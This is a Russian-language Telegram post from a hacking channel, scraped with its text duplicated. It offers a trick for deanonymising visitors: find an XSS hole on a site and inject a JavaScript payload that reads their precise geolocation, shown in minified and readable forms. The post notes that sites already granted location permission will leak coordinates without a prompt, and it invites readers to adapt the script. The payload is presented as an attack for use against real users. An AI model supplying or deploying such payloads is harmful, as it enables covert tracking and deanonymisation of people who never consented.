Hacks & Perks

Привет!

Сегодня немного фишек с деаноном при XSS. Наверняка многие замечали в браузерах фишку с геолокацией.

Так вот знайте, что геолокацию можно использовать и своих целях.

Вам всего лишь нужно найти XSS и повесить туда следующий скрипт (с правками само собой):

navigator.geolocation.getCurrentPosition(function(o){console.log("Lat: "+o.coords.latitude+"\nLon: "+o.coords.longitude)},function(o){console.log(o.message)},{enableHighAccuracy:!0,timeout:5e3});

Данный скрипт обращается к Geolocation API (подробности описаны на MDN). Конечно, для получения координат пользователь должен одобрить запрос, однако если сайт уже работает с geoapi, то скорее всего там уже всё разрешено.

И скрипт в нормальном виде для восприятия:

navigator.geolocation.getCurrentPosition(
    function(position) {
         alert("Lat: " + position.coords.latitude + "\nLon: " + position.coords.longitude);
    },
    function(error){
         alert(error.message);
    }, {
         enableHighAccuracy: true
              ,timeout : 5000
    }
);

#hacks #perks #deanon #xss #js

www.tgoop.com/hacksnperks/60

1.1K viewsAug 21, 2017 at 12:11

Привет!

Сегодня немного фишек с деаноном при XSS. Наверняка многие замечали в браузерах фишку с геолокацией.

Так вот знайте, что геолокацию можно использовать и своих целях.

Вам всего лишь нужно найти XSS и повесить туда следующий скрипт (с правками само собой):

navigator.geolocation.getCurrentPosition(function(o){console.log("Lat: "+o.coords.latitude+"\nLon: "+o.coords.longitude)},function(o){console.log(o.message)},{enableHighAccuracy:!0,timeout:5e3});

navigator.geolocation.getCurrentPosition(
    function(position) {
         alert("Lat: " + position.coords.latitude + "\nLon: " + position.coords.longitude);
    },
    function(error){
         alert(error.message);
    }, {
         enableHighAccuracy: true
              ,timeout : 5000
    }
);

BY Hacks & Perks